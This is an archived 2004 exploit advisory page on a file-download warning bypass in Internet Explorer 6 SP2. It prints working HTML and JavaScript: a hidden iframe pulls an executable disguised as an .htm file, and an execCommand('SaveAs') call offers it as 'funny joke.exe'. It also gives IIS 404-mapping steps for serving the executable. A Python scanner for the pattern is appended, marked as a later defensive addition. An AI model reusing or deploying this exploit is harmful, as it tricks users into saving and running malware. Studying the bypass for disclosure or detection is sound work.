
20041119.IESP2Unpatched.html

Posted Nov 20, 2004
Authored by cyber flash | Site k-otik.com

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masquerading as an HTML file. Full exploitation given. Originally posted on k-otik.

tags | exploit
systems | windows
SHA-256 | 5cf54bfc3b98194b62e01d674a293f76a8b55e5d1942178a1fcfe020e729bc73

<HTML><HEAD><TITLE>Internet Explorer 6.0 SP2 File Download Security 
Warning Bypass Exploit</TITLE>
<BODY id=all text=#000000 vLink=#000020 aLink=#000020 link=#000020
bgColor=#e9e9e9 topMargin=10 marginheight="10" marginwidth="10">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="74%" id="AutoNumber4">
<tr>
<td width="100%">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5">
<tr>
<td width="100%">
<p align="center"><b><font size="1" face="Verdana">Internet
Explorer 6.0 SP2 File Download Security Warning Bypass Exploit</font></b></td>
</tr>
</table><div align="center">
</div>
<font size="1"></font>
<div align="justify">
<pre><font face="Verdana" size="1">Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masquerading as an HTML file.

</font><font color="#FF0000" face="Verdana" size="1">Secunia did not release the technical details (aka Security by Obscurity) </font><font size="1" face="Verdana" color="#FF0000">thus</font><font color="#FF0000" face="Verdana" size="1"> we publish this page (aka Full Disclosure)</font></pre>
</div>
<pre><font face="Verdana" size="1"><b><u>Solution</u></b>

[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] On French-language Windows, disable Active Scripting and the "Masquer les extensions des fichiers dont le type est connu" option [Panneau de
configuration -> Options des dossiers -> Affichage]


<u>Credits</u> : go to cyber flash


<u>How does it work? A.K.A. Exploit

</u>The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:</font></pre>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font face="Verdana"><font color="#000080" size="1"><html><br>
<body><br>
<iframe src</font><font color="#345487" size="1">='http://domain.com/v.exe?.htm'

</font><font color="#000080" size="1">name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Also, here's an example that
requires modifying the IIS Error Mapping Properties (see below):</font></p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font color="#000080" size="1" face="Verdana"><html><br>
<body><br>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click<br>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');"><br>
here</a>.<br>
</body><br>
</html></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Steps to configure IIS:</font></p>
<p><font size="1" face="Verdana">Launch Internet Information
Services manager.<br>
Under the 'Custom Errors' tab, modify the Error Mapping Properties
as follows:</font></p>
<ol type="i">
<li><font size="1" face="Verdana">Error Code: 404 </font></li>
<li><font size="1" face="Verdana">Default Text: Not Found </font>
</li>
<li><font size="1" face="Verdana">Message Type: URL </font></li>
<li><font size="1" face="Verdana">URL: /v.exe (name of the
executable)</font></li>
</ol>
<p><font size="1" face="Verdana">Within the HTML page, insert an
IFRAME as follows:</font></p>
<p><font color="#000080" size="1" face="Verdana"><iframe src='vengy404.htm'
name="NotFound" width="0" height="0"></iframe></font></p>
<p><font size="1" face="Verdana">The file 'vengy404.htm'
intentionally doesn't exist on the server, so requesting it triggers
the 404 error mapping defined above and the server answers with
/v.exe instead. The JavaScript below then references that v.exe data
within the frame 'NotFound' and offers it under the name
'funny joke.exe' when the user is prompted to save the file:</font></p>
<p><font color="#000080" size="1" face="Verdana">javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');</font><font face="Verdana" size="1"><br>
<br>
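<p>A defender-side check for the pattern described above, as an added example that is not part of the original advisory or its author's code: it parses page source and reports any execCommand('SaveAs') call that offers a frame's content under an executable name, noting whether the frame is hidden and whether its URL merely looks like a page. The function and field names and the extension lists are assumptions chosen for illustration.</p>

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

EXEC_EXT = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd")
PAGE_EXT = (".htm", ".html")
# Matches frames.<name>.document.execCommand('SaveAs', <arg>, '<file name>')
SAVEAS = re.compile(
    r"frames\.(\w+)\.document\.execCommand\(\s*['\"]SaveAs['\"]\s*,[^,]*,"
    r"\s*['\"]([^'\"]+)['\"]", re.I)

class Collector(HTMLParser):
    """Collect named iframes plus every attribute value and text/script body."""
    def __init__(self):
        super().__init__()
        self.frames, self.code = {}, []
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe" and a.get("name"):
            self.frames[a["name"].lower()] = a
        self.code.extend(a.values())
    def handle_data(self, data):
        self.code.append(data)

def scan(html):
    """Report SaveAs calls that offer a frame's content under an executable name."""
    c = Collector()
    c.feed(html)
    findings = []
    for frame, name in SAVEAS.findall("\n".join(c.code)):
        name = " ".join(name.split())        # undo line wrapping inside the name
        if not name.lower().endswith(EXEC_EXT):
            continue                         # saving a page as a page is normal
        a = c.frames.get(frame.lower(), {})
        src = a.get("src", "")
        findings.append({
            "frame": frame, "save_as": name, "src": src,
            "hidden": a.get("width") == "0" and a.get("height") == "0",
            "src_ends_like_page": src.lower().endswith(PAGE_EXT),
            "exe_in_path": urlsplit(src).path.lower().endswith(EXEC_EXT),
        })
    return findings

# Constructed input: the first snippet on this page, reduced to the parts scanned.
SAMPLE = """<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');">here</a>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

For the IIS 404-mapping variant the substitution happens on the server, so only the mismatch between a page-like frame URL and an executable save name is visible in the page source.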